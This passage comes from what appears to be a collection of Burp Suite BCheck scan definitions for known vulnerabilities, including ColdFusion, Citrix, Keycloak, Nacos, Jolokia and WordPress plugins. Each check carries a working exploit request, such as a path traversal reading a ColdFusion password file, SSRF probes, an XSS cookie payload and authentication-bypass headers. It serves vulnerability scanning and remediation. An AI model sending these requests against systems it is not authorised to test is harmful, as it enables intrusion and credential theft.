25 | remediation: "Upgrade Juniper SRX firewalls and EX switches to the latest version" 26 | end if 27 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-26360 Adobe ColdFusion Arbitrary File Read and Code Execution.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2023-26360 Adobe ColdFusion Arbitrary File Read and Code Execution" 4 | description: "Checks for CVE-2023-26360" 5 | author: "Ollie Whitehouse" 6 | tags: "CVE-2023-26360 CVE ColdFusion" 7 | 8 | # Details of the vulnerability can be found in https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/ 9 | define: 10 | potential_path = 11 | "//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx" 12 | 13 | given host then 14 | send request called check: 15 | method: "POST" 16 | replacing headers: 17 | "Content-Type": "application/x-www-form-urlencoded" 18 | path: {potential_path} 19 | body: "_variables={\"about\":{\"_metadata\":{\"classname\":\"\\..\\lib\\password.properties\"},\"_variables\":{}}}" 20 | 21 | # Checks that we get a 200 AND that the output we expect in the result 22 | if {check.response.status_code} is "200" and "password=" in {check.response.body} then 23 | report issue: 24 | severity: high 25 | confidence: certain 26 | detail: "Host is vulnerable to the arbitrary file read and code execution vulnerability CVE-2023-26360" 27 | remediation: "See Adobe's APSB23-40 Security Bulletin - CF2018 Update 17, CF2021 Update 7, and CF2023 GA build for patched version" 28 | end if 29 | -------------------------------------------------------------------------------- /other/sentinel/Alibaba-Sentinel-SSRF.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Alibaba Sentinel SSRF " 4 | 
description: "Alibaba Sentinel 1.8.2 is vulnerable to Server-side request forgery (SSRF)." 5 | author: "Javeley" 6 | tags: "SSRF", "CVE-2021-44139","Alibaba" 7 | 8 | define: 9 | ssrf_path=`/registry/machine?app={random_str(5)}&appType=0&version=0&hostname={random_str(5)}&ip={generate_collaborator_address()}&port=0` 10 | 11 | given host then 12 | send request: 13 | method: "GET" 14 | path: {ssrf_path} 15 | if dns interactions then 16 | if http interactions then 17 | report issue: 18 | severity: high 19 | confidence: firm 20 | detail: `CVE-2021-44139. Sentinel before 1.8.3 is vulnerable to Server-side request forgery (SSRF). You can access host/version to view the Sentinel version. fofa body="sentinelDashboardApp"` 21 | remediation: "https://github.com/alibaba/Sentinel/issues/2451" 22 | else then 23 | report issue: 24 | severity: high 25 | confidence: firm 26 | detail: `CVE-2021-44139. Sentinel before 1.8.3 is vulnerable to Server-side request forgery (SSRF). You can access host/version to view the Sentinel version. fofa body="sentinelDashboardApp"` 27 | remediation: "https://github.com/alibaba/Sentinel/issues/2451" 28 | end if 29 | end if 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2018-1000129 - Jolokia 137 - Cross-Site Scripting.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2018-1000129 - Jolokia 1.3.7 - Cross-Site Scripting" 4 | description: "Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser." 
5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "jolokia", "xss", "cve" 7 | 8 | run for each: 9 | potential_path = 10 | "/api/jolokia/read?mimeType=text/html", 11 | "/jolokia/read?mimeType=text/html" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "" in {check.response.body} 20 | and "java.lang.IllegalArgumentException" in {check.response.body} 21 | and "No type with name" in {check.response.body} 22 | and "text/html" in {check.response.headers} then 23 | report issue: 24 | severity: medium 25 | confidence: certain 26 | detail: `Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.` 27 | remediation: "Upgrade Jolokia to the latest version" 28 | end if 29 | -------------------------------------------------------------------------------- /other/bypass/403-429-bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "403/429 bypass using HTTP Header" 4 | description: "Attempts to bypass 403/429 using the HTTP headers with local IP address" 5 | author: "Shadow Surface" 6 | tags: "bypass" 7 | 8 | define: 9 | bypass_ip = "127.0.0.1" 10 | 11 | run for each: 12 | bypass_header = 13 | "Forwarded", 14 | "Via", 15 | "X-Client-IP", 16 | "X-Forwarded-For", 17 | "X-Forwarded-Host", 18 | "X-Forwarded-Proto", 19 | "X-Forwarded-Server", 20 | "X-Forward-For", 21 | "X-Forwared-Host", 22 | "X-Host", 23 | "X-Originating-IP", 24 | "X-Real-IP", 25 | "X-Remote-Addr", 26 | "X-Remote-IP", 27 | "X-Requested-By", 28 | "X-Requested-For", 29 | "X-Trusted-IP" 30 | 31 | given request then 32 | if {base.response.status_code} matches "(403|429)" then 33 | send request: 34 | replacing headers: 35 | {bypass_header}: {bypass_ip} 36 | 37 | if not( {latest.response.status_code} is 
{base.response.status_code} ) then 38 | report issue: 39 | severity: high 40 | confidence: tentative 41 | detail: `Potential {base.response.status_code} bypass using {bypass_header} header.` 42 | remediation: `Avoid using {bypass_header} for authorization or rate limiting.` 43 | end if 44 | end if 45 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-24488 - Citrix Gateway Open Redirect and XSS.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "[CVE-2023-24488] Vulnerable Citrix Gateway Detected." 4 | description: "This rule checks if the remote host is vulnerable to CVE-2023-24488 - Citrix CRLF Injection / Reflected Xss" 5 | author: "TheButcher" 6 | tags: "CVE-2023-24488","citrix","crlf","xss","openredirection" 7 | 8 | define: 9 | potential_path = 10 | "/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if "" in {check.response.body} then 18 | report issue: 19 | severity: medium 20 | confidence: certain 21 | detail: "The post_logout_redirect_uri GET Parameter is susceptible to Open Redirection, which can be exploited for CRLF injection leading to XSS through HTTP Response Splitting. There is also a potential risk of cache poisoning if Citrix Gateway is deployed in such a configuration." 
22 | remediation: "Affected customers of Citrix ADC and Citrix Gateway are recommended to install the relevant updated versions of Citrix ADC or Citrix Gateway as soon as possible - https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488" 23 | 24 | end if 25 | -------------------------------------------------------------------------------- /other/nacos/Nacos-severidentity-bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Nacos ServerIdentity Bypass" 4 | description: "Nacos <= 2.2.0 - ServerIdentity Bypass" 5 | tags: "Unauthorized","Nacos" 6 | author: "JaveleyQAQ" 7 | 8 | run for each: 9 | nacos_detect = 10 | "/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=", 11 | "/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=" 12 | 13 | given host then 14 | send request called nacos: 15 | method: "GET" 16 | path: {nacos_detect} 17 | appending headers: 18 | "serverIdentity": "security" 19 | 20 | if {nacos.response.status_code} is "200" and "application/json" in {nacos.response.headers} and "\"username\":" in {nacos.response.body} and "\"password\":" in {nacos.response.body} then 21 | report issue: 22 | severity: high 23 | confidence: certain 24 | detail: `Nacos <= 2.2.0 platform adds "serverIdentity: security" to the header to bypass authentication and view the list of users. \nhttps://github.com/MrWQ/vulnerability-paper/blob/55e4dca8b537b93c6b90008af2f7eddd68271f2c/bugs/%E9%82%A3%E4%BA%9B%E5%B9%B4%E6%88%91%E4%BB%AC%E4%B8%80%E8%B5%B7%E8%BF%BD%E8%BF%87%E7%9A%84%20Nacos.md` 25 | remediation: `Change the default value of token.secret.key in the application.properties file. 
Refer to https://nacos.io/zh-cn/docs/v2/guide/user/auth.html` 26 | end if 27 | 28 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2022-0140.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2022-0140" 4 | description: "CVE-2022-0140 - WordPress Visual Form Builder < 3.0.6 - Unauthenticated Information Disclosure" 5 | author: "Celia S" 6 | tags: "CVE-2022-0140","WordPress" 7 | 8 | define: 9 | potential_path = "/wp-admin/admin.php?page=vfb-export" 10 | 11 | given host then 12 | send request called check: 13 | `POST /wp-admin/admin.php?page=vfb-export HTTP/1.1 14 | Host: {base.request.url.host} 15 | Referer: {base.request.url.host}/wp-admin/admin.php?page=vfb-export 16 | Content-Type: application/x-www-form-urlencoded 17 | Origin: {base.request.url.host} 18 | Content-Length: 116 19 | 20 | vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File` 21 | 22 | 23 | if {check.response.status_code} is "200" 24 | and {check.response.body} matches "\"Date Submitted\"" 25 | and {check.response.body} matches "\"Entries ID\"" then 26 | 27 | report issue: 28 | severity: info 29 | confidence: certain 30 | detail: `CVE-2022-0140 found at {potential_path}. The plugin does not perform access control on entry form export, allowing unauthenticated users to see the form entries or export it as a CSV File using the vfb-export endpoint.` 31 | remediation: "Upgrade visual-form-builder-plugin. See https://www.fortiguard.com/zeroday/FG-VD-21-082 for details." 
32 | end if 33 | -------------------------------------------------------------------------------- /other/tokens/cookie-cached-on-disk.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Cookie cached on disk" 4 | description: "Checks if cookies are cached on disk" 5 | author: "domwhewell-sage" 6 | tags: "passive" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)Set-Cookie:.+(expires=[\w\d\s:,-]+;|max-age=\d+;).*" then 10 | report issue: 11 | severity: info 12 | confidence: certain 13 | detail: "Cookies are set that have an expires or max-age attribute, these are considered persistent cookies and will be stored on disk by the web browser until the expiration time. Check to ensure these are not used to maintain the login session as if an authenticated user does not click the logout button and instead closes the browser, the session will resume when the browser is re-opened. If an attacker has access to the filesystem location where the web browser cache is stored the session cookie could be extracted and used to authenticate the attacker to the web application. If it is a shared machine another user could authenticate themselves just by re-opening the browser." 14 | remediation: "Session management tokens should make use of non-persistent cookies. This forces the session to disappear from the client if the current web browser is closed. Therefore the expires or max-age attribute should be removed from the session cookie. 
https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html#expire-and-max-age-attributes" 15 | end if 16 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Keycloak before 12.0.1 version - request_uri Blind Server-Side Request Forgery (Unauthenticated)" 4 | description: "Keycloak allows an unauthenticated attacker to send arbitrary values in 'request_uri' parameter and interact with internal network resources which is otherwise not accessible externally. An attacker may use this feature to perform Blind SSRF (Server-side request forgery) attacks on the server." 5 | author: "mrrootsec" 6 | tags: "keycloak", "cve", "ssrf" 7 | 8 | run for each: 9 | potential_path = `/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{generate_collaborator_address()}` 10 | 11 | given host then 12 | send request: 13 | method: `GET` 14 | path: {potential_path} 15 | 16 | if dns interactions then 17 | report issue: 18 | severity: info 19 | confidence: certain 20 | detail: "Vulnerable to CVE-2021-10774 - Keycloak - request_uri Blind Server-Side Request Forgery (SSRF)" 21 | remediation: "Upgrade to the latest version of Keycloak" 22 | end if 23 | 24 | if http interactions then 25 | report issue: 26 | severity: high 27 | confidence: certain 28 | detail: "Vulnerable to CVE-2021-10774 - Keycloak - request_uri Blind Server-Side Request Forgery (SSRF)" 29 | remediation: "Upgrade to the latest version of Keycloak" 30 | end if 31 | -------------------------------------------------------------------------------- /other/files/ds-store-exposed.bcheck: -------------------------------------------------------------------------------- 1 
| metadata: 2 | language: v2-beta 3 | name: ".DS_Store Configuration Check" 4 | description: "Tests for exposed svn config in current path and at the root directory of site" 5 | author: "j3ssie" 6 | tags: "exposure", "ds_store", "config", "file" 7 | 8 | run for each: 9 | potential_path = ".DS_Store" 10 | 11 | given path then 12 | # replace the potential path with the last path 13 | # like if the path is `/v1/settings/public`. it will be convert to `/v1/settings/{potential_path}` 14 | if not({base.request.url.path} is "/") then 15 | send request called check: 16 | method: "GET" 17 | replacing path: `{regex_replace({regex_replace({base.request.url}, "^.*?\/.*?\/.*?\/", "/")}, "([^/]+)$", "")}{potential_path}` 18 | 19 | end if 20 | 21 | # replace the potential path with entire URI 22 | send request called check1: 23 | method: "GET" 24 | replacing path: `{regex_replace({base.request.url}, "^.*", "")}/{potential_path}` 25 | 26 | if {latest.response.status_code} is "200" and 27 | "Bud1" in {latest.response.body} and 28 | "DSDB" in {latest.response.body} then 29 | if {latest.response.headers} matches "Accept-Ranges: bytes" or 30 | {latest.response.headers} matches "octet-stream" then 31 | report issue: 32 | severity: low 33 | confidence: certain 34 | detail: `.DS_Store configuration found at {potential_path}.` 35 | end if 36 | end if 37 | -------------------------------------------------------------------------------- /other/files/svn-exposed.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "SVN Configuration File Exposed" 4 | description: "Tests for exposed svn config in current path and at the root directory of site" 5 | author: "j3ssie" 6 | tags: "exposure", "svn", "config", "file" 7 | 8 | run for each: 9 | potential_path = ".svn/entries", ".svn/text", ".svn/all-wcprops" 10 | 11 | given path then 12 | if {base.request.url.path} is "/" then 13 | # replace the potential path with entire 
URI 14 | send request called check: 15 | method: "GET" 16 | replacing path: `{regex_replace({base.request.url}, "^.*", "")}/{potential_path}` 17 | else then 18 | # replace the potential path with the last path 19 | # like if the path is `/v1/settings/public`. it will be convert to `/v1/settings/{potential_path}` 20 | send request called check1: 21 | method: "GET" 22 | replacing path: `{regex_replace({regex_replace({base.request.url}, "^.*?\/.*?\/.*?\/", "/")}, "([^/]+)$", "")}{potential_path}` 23 | end if 24 | 25 | if {latest.response.status_code} is "200" then 26 | if ("END" in {latest.response.body} and 27 | "svn:" in {latest.response.body}) or 28 | ("dir" in {latest.response.body} and 29 | "